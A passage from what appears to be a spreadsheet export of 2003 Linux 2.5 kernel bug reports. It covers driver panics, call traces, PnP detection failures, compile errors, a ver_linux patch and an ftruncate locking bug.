tsbogend@alpha.franken.de PPP generic driver version 2.4.2 PPP Deflate Compression module registered PPP BSD Compression module registered Universal TUN/TAP device driver 1.5 (C)1999-2002 Maxim Krasnyansky Uniform Multi-Platform E-IDE driver Revision: 7.00alpha2 ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx SIS5513: IDE controller at PCI slot 00:02.5 SIS5513: chipset revision 0 SIS5513: not 100% native mode: will probe irqs later SiS648 ATA 133 controller ide0: BM-DMA at 0xa400-0xa407, BIOS settings: hda:DMA, hdb:DMA ide1: BM-DMA at 0xa408-0xa40f, BIOS settings: hdc:DMA, hdd:DMA hda: WDC WD800BB-00CAA1, ATA DISK drive hdb: IC35L040AVER07-0, ATA DISK drive ide0 at 0x1f0-0x1f7,0x3f6 on irq 14 hdc: MATSHITADVD-ROM SR-8584A, ATAPI CD/DVD-ROM drive hdd: TDK CDRW4800B, ATAPI CD/DVD-ROM drive ide1 at 0x170-0x177,0x376 on irq 15 hda: host protected area =&gt; 1 hda: 156301488 sectors (80026 MB) w/2048KiB Cache, CHS=155061/16/63, UDMA(100) hda: hda1 hda2 hda3 &lt; hda5 hda6 hda7 hda8 &gt; hda4 hdb: host protected area =&gt; 1 hdb: 80418240 sectors (41174 MB) w/1916KiB Cache, CHS=79780/16/63, UDMA(100) hdb: hdb1 hdb2 hdb3 &lt; hdb5 hdb6 &gt; hdc: ATAPI 32X DVD-ROM drive, 512kB Cache, UDMA(33) Uniform CD-ROM driver Revision: 3.12 hdd: ATAPI 48X CD-ROM CD-R/RW drive, 2048kB Cache, UDMA(33) end_request: I/O error, dev hdd, sector 0 ide-floppy driver 0.99.newide scsi0 : Adaptec AIC7XXX EISA/VLB/PCI SCSI HBA DRIVER, Rev 6.2.26 &lt;Adaptec 2940 Ultra2 SCSI adapter&gt; aic7890/91: Ultra2 Wide Channel A, SCSI Id=7, 32/253 SCBs (scsi0:A:0): 40.000MB/s transfers (20.000MHz, offset 127, 16bit) Vendor: FUJITSU Model: MAN3367MP Rev: 5507 Type: Direct-Access ANSI SCSI revision: 03 scsi0:A:0:0: Tagged Queuing enabled. Depth 64 scsi1 : SCSI host adapter emulation for IDE ATAPI devices SCSI device sda: drive cache: write through SCSI device sda: 71132959 512-byte hdwr sectors (36420 MB) sda: sda1 sda2 sda3 sda4 &lt; sda5 sda6 &gt; Attached scsi disk sda at scsi0, channel 0, id 0, lun 0 device class 'input': registering register interface 'mouse' with class 'input' mice: PS/2 mouse device common for all mice input: PS/2 Logitech Mouse on isa0060/serio1 serio: i8042 AUX port at 0x60,0x64 irq 12 input: AT Set 2 keyboard on isa0060/serio0 serio: i8042 KBD port at 0x60,0x64 irq 1 Advanced Linux Sound Architecture Driver Version 0.9.0rc6 (Tue Dec 17 19:01:13 2002 UTC). ALSA device list: #0: Sound Blaster Live! at 0x8000, irq 17 NET4: Linux TCP/IP 1.0 for NET4.0 IP: routing cache hash table of 4096 buckets, 32Kbytes TCP: Hash tables configured (established 32768 bind 65536) IPv4 over IPv4 tunneling driver GRE over IPv4 tunneling driver ip_tables: (C) 2000-2002 Netfilter core team Initializing IPsec netlink socket NET4: Unix domain sockets 1.0/SMP for Linux NET4.0. IPv6 v0.8 for NET4.0 IPv6 over IPv4 tunneling driver kjournald starting. Commit interval 5 seconds ...</t>
  </si>
  <si>
    <t>2003-01-11 09:23 UTC</t>
  </si>
  <si>
    <t>Knut J Bjuland</t>
  </si>
  <si>
    <t>2003-02-21 04:48 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version:2.5.54 Distribution:Redhat 8.0 Hardware Environment:i815 chipset Software Environment:glibc 2.3.1, gcc 3.2.1 Problem Description:genrate-modules.conf does not produce a /etc/modprobe.conf Steps to reproduce: ./genrate-modules.conf /etc/modprobe.conf, I booted into lnux 2.5 with linux-2.5 single from lilo. This is my /etc/modules.conf alias parport_lowlevel parport_pc alias usb-controller usb-uhci alias eth0 3c59x # post-install emu10k1 /etc/emu10k1/setemu # options emu10k1 tone_control=1 # #alsa alias char-major-116 snd alias snd-card-0 snd-emu10k1 #options snd snd_cards_limit=1 ##oss lite alias char-major-14 soundcore alias sound-slot-0 snd-card-0 ##oss service alias sound-service-0-0 snd-mixer-oss alias sound-service-0-1 snd-seq-oss alias sound-service-0-3 snd-pcm-oss alias sound-service-0-8 snd-seq-oss alias sound-service-0-12 snd-pcm-oss post-install snd-emu10k1-synth sfxload /etc/midi/8mbgmsfx.sf2; /usr/sbin/alsactl restore # alsa finsihed options ide-cd dma=1 # bttv #alias char-major-81 videodev alias char-major-81 bttv # BTTV setup by JeMi - 8/Dec/2000 options bttv pll=1 radio=0 card=39 options tuner type=5 post-install bttv /sbin/modprobe "-k" tuner; # /sbin/modprobe "-k" msp3400 #nvidia alias char-major-195 nvidia</t>
  </si>
  <si>
    <t>ver_linux script fails to give module-init-tools version</t>
  </si>
  <si>
    <t>2003-01-11 14:57 UTC</t>
  </si>
  <si>
    <t>2003-10-07 19:51 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.56 Distribution: Debian Testing Hardware Environment: single x86 cpu, IDE Software Environment: # CONFIG_MODULES is not set Problem Description: In a system without module support, the ver_linux script gives wrong information for the module-init-tools line. It prints this: module-init-tools implemented Steps to reproduce: Run scripts/ver_linux on a system without module support. It does this because it takes the output from the first line, which is an error without module support. bwindle@morpheus:/new1/linux$ rmmod -V rmmod: QM_MODULES: Function not implemented rmmod version 2.4.19 This patch seems to work around it, but I bet it could be done in a better manner. morpheus:/new1# diff -u linux/scripts/ver_linux.orig linux/scripts/ver_linux --- linux/scripts/ver_linux.orig 2003-01-11 17:55:24.000000000 -0500 +++ linux/scripts/ver_linux 2003-01-11 17:56:01.000000000 -0500 @@ -28,7 +28,7 @@ mount --version | awk -F\- '{print "mount ", $NF}' -rmmod -V 2&gt;&amp;1 | awk 'NR==1 {print "module-init-tools ",$NF}' +rmmod -V 2&gt;&amp;1 | awk '/rmmod version/{print "module-init-tools ",$NF}' tune2fs 2&gt;&amp;1 | grep "^tune2fs" | sed 's/,//' | awk \ 'NR==1 {print "e2fsprogs ", $2}'</t>
  </si>
  <si>
    <t>2.5 kconfig doesn't handle "&amp;&amp; m" correctly when module support is disabled</t>
  </si>
  <si>
    <t>2003-01-11 23:39 UTC</t>
  </si>
  <si>
    <t>panic loading ALSA driver for cs4232</t>
  </si>
  <si>
    <t>2003-01-12 06:22 UTC</t>
  </si>
  <si>
    <t>2003-05-04 07:40 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.56 Distribution: Debian/sarge Hardware Environment: IBM thinkpad 600 Problem Description: ALSA sound/isa/cs423x/cs4231_lib.c:242: in: auto calibration time out - reg = 0x18 ALSA sound/core/pcm_lib.c:1772: BUG? (substream != ((void *)0)) (called from c6ae8a70) ALSA sound/isa/cs423x/cs4231_lib.c:242: in: auto calibration time out - reg = 0xb Unable to handle kernel NULL pointer dereference at virtual address 00000050 printing eip: c6ae89b9 *pde = 00000000 Oops: 0000 CPU: 0 EIP: 0060:[&lt;c6ae89b9&gt;] Not tainted EFLAGS: 00010006 EIP is at snd_cs4231_overrange+0x45/0x3951768c [snd_cs4231_lib] eax: 00000000 ebx: c273c000 ecx: 00000001 edx: 00000531 esi: 00000086 edi: c0540e18 ebp: c273de4c esp: c273de3c ds: 007b es: 007b ss: 0068 Process modprobe (pid: 9411, threadinfo=c273c000 task=c1ff67c0) Stack: c243f7e4 c0540e18 00000009 ff540e18 c273de64 c6ae8a80 c0540e18 c243f7e4 20000001 c5fcf8ff c273de84 c010a1e8 00000009 c0540e18 c273deb4 c273c000 c273c000 c03cba20 c273deac c010a3d1 00000009 c273deb4 c243f7e4 c03cba20 Call Trace: [&lt;c6ae8a80&gt;] snd_cs4231_interrupt+0xb4/0x39517634 [snd_cs4231_lib] [&lt;c010a1e8&gt;] handle_IRQ_event+0x28/0x50 [&lt;c010a3d1&gt;] do_IRQ+0xc5/0x140 [&lt;c0108f00&gt;] common_interrupt+0x18/0x20 [&lt;c010a8db&gt;] setup_irq+0xa7/0xd4 [&lt;c6ae89cc&gt;] snd_cs4231_interrupt+0x0/0x39517634 [snd_cs4231_lib] [&lt;c010a4d9&gt;] request_irq+0x8d/0xa8 [&lt;c6ae9987&gt;] snd_cs4231_create+0xd3/0x3951674c [snd_cs4231_lib] [&lt;c6ae89cc&gt;] snd_cs4231_interrupt+0x0/0x39517634 [snd_cs4231_lib] [&lt;c6aeb497&gt;] +0xf17/0x39515a80 [snd_cs4231_lib] [&lt;c6aca2e0&gt;] irq+0x0/0xfffa70c4 [snd_cs4232] [&lt;c6aca320&gt;] dma1+0x0/0xfffa7084 [snd_cs4232] [&lt;c6a71168&gt;] 0xc6a71168 [&lt;c6aca220&gt;] enable+0x0/0xfffa7184 [snd_cs4232] [&lt;c6a7136c&gt;] 0xc6a7136c [&lt;c6aca380&gt;] +0x0/0xfffa7024 [snd_cs4232] [&lt;c012c9e6&gt;] sys_init_module+0x13a/0x1cc [&lt;c0108d93&gt;] syscall_call+0x7/0xb Code: 8b 40 50 ff 40 0c 8d 65 f0 5b 5e 5f 89 ec 5d c3 8d 76 00 55 &lt;0&gt;Kernel panic: Aiee, killing interrupt handler! In interrupt handler - not syncing</t>
  </si>
  <si>
    <t>test bug for testing the kernel tracker</t>
  </si>
  <si>
    <t>2.16.2</t>
  </si>
  <si>
    <t>2003-01-14 14:11 UTC</t>
  </si>
  <si>
    <t>2008-05-29 16:06 UTC</t>
  </si>
  <si>
    <t>A bug for testing email and state changes in the kernel tracker.</t>
  </si>
  <si>
    <t>Dangerous status when start network (driver is e100).</t>
  </si>
  <si>
    <t>linux-2.5.58</t>
  </si>
  <si>
    <t>2003-01-14 19:40 UTC</t>
  </si>
  <si>
    <t>Distribution: Redhat8.0 &amp; linux-2.5.58 Hardware Environment: Intel STL2 mother board Problem Description: Insert the e100 driver. Start the network, before network starting finish, sftp log to the host in another computer. There is a CALLTRACE to ringbuffer. Steps to reproduce: modprobe e100 /etc/init.d/netword/start (another computer) sftp usr@hostIP There is a error message: e100: selftest OK. Freeing alive device dbcdd800, eth%d e100: eth0: Intel(R) 8255x-based Ethernet Adapter Hardware receive checksums enabled cpu cycle saver enabled e100: eth0 NIC Link is Up 100 Mbps Full duplex Debug: sleeping function called from illegal context at mm/page_alloc.c:475 Call Trace: [&lt;c0139b24&gt;] __alloc_pages+0x2d4/0x2e0 [&lt;c0180838&gt;] proc_create+0xa8/0xf0 [&lt;c0139b52&gt;] __get_free_pages+0x22/0x60 [&lt;c0110a2d&gt;] dma_alloc_coherent+0x4d/0x90 [&lt;e08afb1f&gt;] e100_alloc_non_tx_cmd+0x4f/0x1f750530 [e100] [&lt;e08abdda&gt;] e100_set_multi_exec+0x1a/0x1f754240 [e100] [&lt;e08abee4&gt;] e100_set_multi+0x64/0x1f754180 [e100] [&lt;c0368380&gt;] __dev_mc_upload+0x30/0x40 [&lt;c0368655&gt;] dev_mc_add+0xe5/0x200 [&lt;c03a254f&gt;] ip_mc_filter_add+0x5f/0x70 [&lt;c011ccf2&gt;] __wake_up_locked+0x22/0x30 [&lt;c03a26f5&gt;] igmp_group_added+0xa5/0xb0 [&lt;c03a2823&gt;] ip_mc_inc_group+0x123/0x180 [&lt;c03a2a52&gt;] ip_mc_up+0x32/0x80 [&lt;c039ded8&gt;] inetdev_init+0x168/0x1b0 [&lt;c039e5be&gt;] inet_set_ifa+0x8e/0xf0 [&lt;c039edcf&gt;] devinet_ioctl+0x34f/0x5e0 [&lt;c03a18c0&gt;] inet_ioctl+0xd0/0x120 [&lt;c03b14f5&gt;] packet_ioctl+0x1a5/0x1e0 [&lt;c035ea44&gt;] sock_ioctl+0x104/0x290 [&lt;c016304f&gt;] sys_ioctl+0xef/0x280 [&lt;c01098bb&gt;] syscall_call+0x7/0xb</t>
  </si>
  <si>
    <t>lots of 'debug: sleeping functions'  with odd CPU speed</t>
  </si>
  <si>
    <t>Slab Allocator</t>
  </si>
  <si>
    <t>2.5.57</t>
  </si>
  <si>
    <t>2003-01-15 09:54 UTC</t>
  </si>
  <si>
    <t>2003-03-03 08:33 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Testing Hardware Environment: single P2 266, 256mb ram Software Environment: Problem Description: Memory: 126564k/131072k available (1580k kernel code, 3948k reserved, 592k data, 260k init, 0k highmem) Debug: sleeping function called from illegal context at mm/slab.c:1617 Call Trace: [&lt;c011257c&gt;] __might_sleep+0x54/0x58 [&lt;c0128d87&gt;] kmem_cache_alloc+0x1f/0xf8 [&lt;c0127f00&gt;] kmem_cache_create+0xbc/0x490 [&lt;c010f94e&gt;] zap_low_mappings+0xe/0x40 [&lt;c0105000&gt;] _stext+0x0/0x50 Debug: sleeping function called from illegal context at include/asm/semaphore.h: 119 Call Trace: [&lt;c011257c&gt;] __might_sleep+0x54/0x58 [&lt;c01281e3&gt;] kmem_cache_create+0x39f/0x490 [&lt;c0105000&gt;] _stext+0x0/0x50 Dentry cache hash table entries: 16384 (order: 5, 131072 bytes) Inode-cache hash table entries: 8192 (order: 4, 65536 bytes) Debug: sleeping function called from illegal context at mm/slab.c:1617 Call Trace: [&lt;c011257c&gt;] __might_sleep+0x54/0x58 [&lt;c0128d87&gt;] kmem_cache_alloc+0x1f/0xf8 [&lt;c0105000&gt;] _stext+0x0/0x50 [&lt;c0127f00&gt;] kmem_cache_create+0xbc/0x490 [&lt;c0105000&gt;] _stext+0x0/0x50 [&lt;c0108ba4&gt;] common_interrupt+0x18/0x20 [&lt;c0105000&gt;] _stext+0x0/0x50 [&lt;c014e2f0&gt;] init_once+0x0/0x1c Debug: sleeping function called from illegal context at mm/slab.c:1617 Call Trace: [&lt;c011257c&gt;] __might_sleep+0x54/0x58 [&lt;c0128ebb&gt;] kmalloc+0x5b/0x14c [&lt;c0128162&gt;] kmem_cache_create+0x31e/0x490 [&lt;c0105000&gt;] _stext+0x0/0x50 [&lt;c014e2f0&gt;] init_once+0x0/0x1c Debug: sleeping function called from illegal context at include/asm/semaphore.h: 119 Call Trace: [&lt;c011257c&gt;] __might_sleep+0x54/0x58 [&lt;c01281e3&gt;] kmem_cache_create+0x39f/0x490 [&lt;c0105000&gt;] _stext+0x0/0x50 [&lt;c014e2f0&gt;] init_once+0x0/0x1c Mount-cache hash table entries: 512 (order: 0, 4096 bytes) Debug: sleeping function called from illegal context at mm/slab.c:1617 Call Trace: [&lt;c011257c&gt;] __might_sleep+0x54/0x58 [&lt;c0128d87&gt;] kmem_cache_alloc+0x1f/0xf8 [&lt;c0150548&gt;] alloc_vfsmnt+0x18/0xa0 [&lt;c013f928&gt;] do_kern_mount+0x30/0xb4 [&lt;c0105000&gt;] _stext+0x0/0x50 Debug: sleeping function called from illegal context at mm/page_alloc.c:475 Call Trace: [&lt;c011257c&gt;] __might_sleep+0x54/0x58 [&lt;c0125fe3&gt;] __alloc_pages+0x2b/0x270 [&lt;c01147a9&gt;] call_console_drivers+0xd9/0xe0 [&lt;c0126250&gt;] __get_free_pages+0x28/0x64 [&lt;c01286e3&gt;] cache_grow+0xbb/0x214 [&lt;c0128a48&gt;] cache_alloc_refill+0x20c/0x258 [&lt;c0128dc4&gt;] kmem_cache_alloc+0x5c/0xf8 [&lt;c0150548&gt;] alloc_vfsmnt+0x18/0xa0 [&lt;c013f928&gt;] do_kern_mount+0x30/0xb4 [&lt;c0105000&gt;] _stext+0x0/0x50 Steps to reproduce: I was playing in my BIOS settings with the CPU speed... either '266' or 'compatible'. I tried booting with CPU speed set to compatible, and (besides the machine being REALLY slow) I got lots of these. They might be false positivies due to slowness of the machine throwing timings off, but I figured I might as well report them :)</t>
  </si>
  <si>
    <t>cs4232 detects, but writing to dsp gives ENODEV</t>
  </si>
  <si>
    <t>2.5.58-bk1</t>
  </si>
  <si>
    <t>2003-01-15 11:00 UTC</t>
  </si>
  <si>
    <t>2003-01-21 07:20 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Testing Hardware Environment: single P2 266, Dell Optiplex GXa, CS4232 ISA sound card Software Environment: CONFIG_PNP=y CONFIG_PNP_NAMES=y CONFIG_PNP_CARD=y CONFIG_ISAPNP=y CONFIG_PNPBIOS=y CONFIG_SOUND=y CONFIG_SOUND_PRIME=y CONFIG_SOUND_OSS=y CONFIG_SOUND_CS4232=y Problem Description: Hey, we're getting closer.. at least the cs4232 compiles now (as of 2.5.58). However, when trying to write to /dev/dsp, I'm getting a ENODEV. dmesg snippet: Linux Plug and Play Support v0.94 (c) Adam Belay pnp: Enabling Plug and Play Card Services. PnPBIOS: Found PnP BIOS installation structure at 0xc00fe2d0 PnPBIOS: PnP BIOS version 1.0, entry 0xf0000:0xe2f4, dseg 0x40 PnPBIOS: 13 nodes reported by PnP BIOS; 13 recorded by driver isapnp: Scanning for PnP cards... isapnp: Card 'CS4236B' isapnp: Card 'U.S.Robotics Inc. Sportster 33.6 FAX Internal' isapnp: 2 Plug &amp; Play cards detected total (snip) cs4232: Must set io, irq and dma. ad1848/cs4248 codec driver Copyright (C) by Hannu Savolainen 1993-1996 ad1848: PnP reports 'CS4236B' at i/o 0x534, irq 5, dma 1, 3 But when trying to write to /dev/dsp, I get: open("/dev/dsp", O_WRONLY|O_NONBLOCK|O_CREAT|O_NOCTTY|O_LARGEFILE, 0666) = -1 ENODEV (No such device) Steps to reproduce:</t>
  </si>
  <si>
    <t>reading legacy_device_resources gives msg "Unexpected status"</t>
  </si>
  <si>
    <t>2003-01-15 11:14 UTC</t>
  </si>
  <si>
    <t>2003-05-15 08:19 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Testing Hardware Environment: P2 266, two ISA devices Software Environment: CONFIG_PNP=y CONFIG_PNP_NAMES=y CONFIG_PNP_CARD=y # CONFIG_PNP_DEBUG is not set CONFIG_ISAPNP=y CONFIG_PNPBIOS=y Problem Description: doing 'cat /proc/bus/pnp/legacy_device_resources' yields the following message on the console: PnPBIOS: get_stat_res: Unexpected status 0x8d Steps to reproduce: 'cat /proc/bus/pnp/legacy_device_resources'</t>
  </si>
  <si>
    <t>ftruncate() segmentation faulting with nonblocking locks</t>
  </si>
  <si>
    <t>2.5.58</t>
  </si>
  <si>
    <t>2003-01-16 09:42 UTC</t>
  </si>
  <si>
    <t>Robbie Williamson</t>
  </si>
  <si>
    <t>Distribution: SuSE 8.0 Hardware Environment: processor : 0 vendor_id : GenuineIntel cpu family : 6 model : 8 model name : Pentium III (Coppermine) stepping : 10 cpu MHz : 863.760 cache size : 256 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 2 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 mmx fxsr sse bogomips : 1708.03 MemTotal: 253312 kB MemFree: 143124 kB Buffers: 6532 kB Cached: 85736 kB SwapCached: 0 kB Active: 35512 kB Inactive: 62360 kB HighTotal: 0 kB HighFree: 0 kB LowTotal: 253312 kB LowFree: 143124 kB SwapTotal: 530136 kB SwapFree: 530136 kB Dirty: 0 kB Writeback: 0 kB Mapped: 9268 kB Slab: 9616 kB Committed_AS: 21112 kB PageTables: 296 kB ReverseMaps: 5894 Software Environment: Gnu C 2.95.3 Gnu make 3.79.1 util-linux 2.11n mount 2.11n modutils 2.4.12 e2fsprogs 1.26 PPP 2.4.1 isdn4k-utils 3.1pre4 Linux C Library x 1 root root 1394238 Mar 23 2002 /lib/libc.so.6 Dynamic linker (ldd) 2.2.5 Procps 2.0.7 Net-tools 1.60 Kbd 1.06 Sh-utils 2.0 No Modules Loaded Problem Description: A program forks two processes. The child process opens a particular file and issues a lock on a specific range of data using fcntl. The child then sends a signal to the parent to continue processing, while it pauses. The parent process, after receiving the signal from the child, opens the same file and attempts to truncate/ftruncate the file down to a size that is less than the area locked by the child process. Instead of failing as expected, the parent process truncate/ftruncate call succeeds. Steps to reproduce: The Linux Test Project has a test, ftruncate04, under /testcases/kernel/syscalls/ftruncate that will duplicate this problem. It is currently only available from the CVS tree. However, I will add the code as an attachment to this bug entry.</t>
  </si>
  <si>
    <t>soundcore missing symbol</t>
  </si>
  <si>
    <t>2.5.56 through 2.5.58</t>
  </si>
  <si>
    <t>2003-01-17 06:41 UTC</t>
  </si>
  <si>
    <t>2003-02-08 09:00 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo 1.4 Hardware Environment: Pentium III, PIIX chipset Software Environment: gcc 3.2.1 Problem Description: WARNING: /lib/modules/2.5.58/kernel/sound/soundcore.ko needs unknown symbol errno Steps to reproduce: Configure for a sound driver (using snd_intel8x0), make modules_install gives the above warning. This results in not being able to load any sound driver. Will attach .config.</t>
  </si>
  <si>
    <t>tty drivers need to set .owner field</t>
  </si>
  <si>
    <t>2.5.59</t>
  </si>
  <si>
    <t>2003-01-17 10:26 UTC</t>
  </si>
  <si>
    <t>2003-05-13 11:24 UTC</t>
  </si>
  <si>
    <t>all struct tty_driver needs to add a .owner field to point to THIS_MODULE and remove all MOD_INC* and MOD_DEC* calls from them. This is to remove the race, and the compiler warnings.</t>
  </si>
  <si>
    <t>Jayce Dowell</t>
  </si>
  <si>
    <t>Compile failure in drivers/ieee1394/pcilynx.c</t>
  </si>
  <si>
    <t>2003-01-17 17:19 UTC</t>
  </si>
  <si>
    <t>2003-04-14 12:47 UTC</t>
  </si>
  <si>
    <t>Distribution: Mandrake 9.0 Hardware Environment: Athlon-XP Software Environment: gcc-3.2 Problem Description: Compile failure in driver/ieee1394.c gcc -Wp,-MD,drivers/ieee1394/.pcilynx.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=athlon -Iinclude/asm-i386/mach-default -fomit-frame-pointer -nostdinc -iwithprefix include -DMODULE -DKBUILD_BASENAME=pcilynx -DKBUILD_MODNAME=pcilynx -c -o drivers/ieee1394/pcilynx.o drivers/ieee1394/pcilynx.c drivers/ieee1394/pcilynx.c:139: warning: initialization from incompatible pointer type drivers/ieee1394/pcilynx.c:140: warning: missing braces around initializer drivers/ieee1394/pcilynx.c:140: warning: (near initialization for `bit_ops.name') drivers/ieee1394/pcilynx.c:141: warning: initialization makes integer from pointer without a cast drivers/ieee1394/pcilynx.c:142: warning: initialization makes integer from pointer without a cast drivers/ieee1394/pcilynx.c:143: warning: initialization makes integer from pointer without a cast drivers/ieee1394/pcilynx.c:144: warning: initialization makes integer from pointer without a cast drivers/ieee1394/pcilynx.c:145: warning: initialization makes integer from pointer without a cast drivers/ieee1394/pcilynx.c:145: initializer element is not computable at load time drivers/ieee1394/pcilynx.c:145: (near initialization for `bit_ops.name[5]') drivers/ieee1394/pcilynx.c:146: warning: initialization makes integer from pointer without a cast drivers/ieee1394/pcilynx.c:146: initializer element is not computable at load time drivers/ieee1394/pcilynx.c:146: (near initialization for `bit_ops.name[6]') drivers/ieee1394/pcilynx.c:147: initializer element is not constant drivers/ieee1394/pcilynx.c:147: (near initialization for `bit_ops.name') drivers/ieee1394/pcilynx.c: In function `lynx_devctl': drivers/ieee1394/pcilynx.c:763: warning: `_MOD_INC_USE_COUNT' is deprecated (declared at include/linux/module.h:429) drivers/ieee1394/pcilynx.c:765: warning: `__MOD_DEC_USE_COUNT' is deprecated (declared at include/linux/module.h:404) make[2]: *** [drivers/ieee1394/pcilynx.o] Error 1 make[1]: *** [drivers/ieee1394] Error 2 make: *** [drivers] Error 2 Steps to reproduce: make dep &amp;&amp; make bzImage &amp;&amp; make modules .config file attached</t>
  </si>
  <si>
    <t>kernel BUG at mm/slab.c</t>
  </si>
  <si>
    <t>2003-01-21 09:42 UTC</t>
  </si>
  <si>
    <t>Jeff Martin</t>
  </si>
  <si>
    <t>2003-03-17 15:23 UTC</t>
  </si>
  <si>
    <t>Distribution: RedHat 8.0 Hardware Environment: 8-way P3-700Mhz, 10G RAM Software Environment: gcc version 3.2 20020903 (Red Hat Linux 8.0 3.2-7) GNU C Library development release version 2.2.93 GNU ld version 2.13.90.0.2 Problem Description: Jan 16 15:12:51 tiefighter kernel: kernel BUG at mm/slab.c:1096! Jan 16 15:12:51 tiefighter kernel: invalid operand: 0000 Jan 16 15:12:51 tiefighter kernel: CPU: 1 Jan 16 15:12:51 tiefighter kernel: EIP: 0060:[&lt;c01385e0&gt;] Not tainted Jan 16 15:12:51 tiefighter kernel: EFLAGS: 00010246 Jan 16 15:12:51 tiefighter kernel: EIP is at cache_grow+0x68/0x33c Jan 16 15:12:51 tiefighter kernel: eax: 00000000 ebx: f039e000 ecx: c1bd9c60 edx: 00000000 Jan 16 15:12:51 tiefighter kernel: esi: 000001d0 edi: f039e000 ebp: c1bd9c60 esp: f039fe38 Jan 16 15:12:51 tiefighter kernel: ds: 007b es: 007b ss: 0068 Jan 16 15:12:51 tiefighter kernel: Process inode02 (pid: 24861, threadinfo=f039e000 task=ee0cc0e0) Jan 16 15:12:51 tiefighter kernel: Stack: f039e000 c1bd9c60 f039e000 f6f26400 c058c480 00000000 00000000 ee0cc0e0 Jan 16 15:12:51 tiefighter kernel: f039fe60 00000010 00000001 000001d0 f039e000 c1bd9c60 c0138c4f c1bd9c60 Jan 16 15:12:51 tiefighter kernel: 000001d0 000001d0 c1bd9c60 00000296 f6f26400 c1bd9d1c c1bd9ce8 caff9b34 Jan 16 15:12:51 tiefighter kernel: Call Trace: Jan 16 15:12:51 tiefighter kernel: [&lt;c0138c4f&gt;] cache_alloc_refill+0x39b/0x3f0 Jan 16 15:12:51 tiefighter kernel: [&lt;c0132158&gt;] find_get_page+0x44/0x6c Jan 16 15:12:51 tiefighter kernel: [&lt;c013910e&gt;] kmem_cache_alloc+0x56/0x104 Jan 16 15:12:51 tiefighter kernel: [&lt;c019f1d8&gt;] ext2_alloc_inode+0x10/0x3c Jan 16 15:12:51 tiefighter kernel: [&lt;c0165624&gt;] alloc_inode+0x14/0x150 Jan 16 15:12:51 tiefighter kernel: [&lt;c0165fdc&gt;] new_inode+0xc/0xc8 Jan 16 15:12:51 tiefighter kernel: [&lt;c019c46b&gt;] ext2_new_inode+0x1f/0x4dc Jan 16 15:12:51 tiefighter kernel: [&lt;c01196c8&gt;] preempt_schedule+0x28/0x44 Jan 16 15:12:51 tiefighter kernel: [&lt;c019ebfc&gt;] ext2_mkdir+0x3c/0x108 Jan 16 15:12:51 tiefighter kernel: [&lt;c015c39e&gt;] vfs_mkdir+0x66/0x90 Jan 16 15:12:51 tiefighter kernel: [&lt;c015c459&gt;] sys_mkdir+0x91/0xd8 Jan 16 15:12:51 tiefighter kernel: [&lt;c0109067&gt;] syscall_call+0x7/0xb Jan 16 15:12:51 tiefighter kernel: Jan 16 15:12:51 tiefighter kernel: Code: 0f 0b 48 04 27 27 3e c0 bb 00 e0 ff ff 21 e3 ff 43 10 8d 85 Steps to reproduce: 1.) d/l and install ltp-20030110 2.) runalltests.sh -t 120h 3.) seemingly random time to reproduce error...ranging from hours to as much as a day.</t>
  </si>
  <si>
    <t>Sym 53c416 fails to detect properly with ISAPNP</t>
  </si>
  <si>
    <t>2.5.58-bk2</t>
  </si>
  <si>
    <t>2003-01-21 14:08 UTC</t>
  </si>
  <si>
    <t>2003-12-18 07:07 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Testing Hardware Environment: x86 CPU, Dell OptiPlex GXa Software Environment: CONFIG_PNP=y CONFIG_PNP_NAMES=y CONFIG_PNP_CARD=y # CONFIG_PNP_DEBUG is not set CONFIG_ISAPNP=y CONFIG_PNPBIOS=y CONFIG_SCSI=y CONFIG_SCSI_SYM53C416=y Problem Description: I just acquired a Sym 53c416 ISA SCSI card, and wanted to see if it works in Linux. I haven't used it ever. On boot, the ISAPNP system finds it, but gives it funny IRQ/DMAs. Linux Plug and Play Support v0.94 (c) Adam Belay pnp: Enabling Plug and Play Card Services. PnPBIOS: Found PnP BIOS installation structure at 0xc00fe2d0 PnPBIOS: PnP BIOS version 1.0, entry 0xf0000:0xe2f4, dseg 0x40 PnPBIOS: 13 nodes reported by PnP BIOS; 13 recorded by driver isapnp: Scanning for PnP cards... isapnp: Card 'SYM 53C416' isapnp: Card 'CS4236B' isapnp: 2 Plug &amp; Play cards detected total sym53c416.c: Version 1.0.0-ac sym53c416: ISAPnP card found and configured at 0x0, IRQ -1. No sym53c416 found at address 0x000 cat /proc/scsi/sg/debug sg_dev_arr NULL, driver not initialized Steps to reproduce:</t>
  </si>
  <si>
    <t>Compile failure on drivers/isdn/i4l/isdn_net_lib.c</t>
  </si>
  <si>
    <t>ISDN</t>
  </si>
  <si>
    <t>2003-01-23 23:40 UTC</t>
  </si>
  <si>
    <t>Stefan (metze) Metzmacher</t>
  </si>
  <si>
    <t>2003-06-11 09:28 UTC</t>
  </si>
  <si>
    <t>Distribution: SuSE7.3 Hardware Environment: Pentium III (i686) Software Environment: gcc 2.95.3 Problem Description: drivers/isdn/i4l/isdn_net_lib.c: In function `bhup': drivers/isdn/i4l/isdn_net_lib.c:1779: warning: control reaches end of non-void function drivers/isdn/i4l/isdn_net_lib.c: In function `isdn_net_handle_event': drivers/isdn/i4l/isdn_net_lib.c:1901: warning: control reaches end of non-void function drivers/isdn/i4l/isdn_net_lib.c: In function `isdn_net_lib_init': drivers/isdn/i4l/isdn_net_lib.c:2330: `isdn_x25_ops' undeclared (first use in this function) drivers/isdn/i4l/isdn_net_lib.c:2330: (Each undeclared identifier is reported only once drivers/isdn/i4l/isdn_net_lib.c:2330: for each function it appears in.) make[3]: *** [drivers/isdn/i4l/isdn_net_lib.o] Error 1 make[2]: *** [drivers/isdn/i4l] Error 2 make[1]: *** [drivers/isdn] Error 2 make: *** [drivers] Error 2 Steps to reproduce: CONFIG_ISDN_BOOL=y 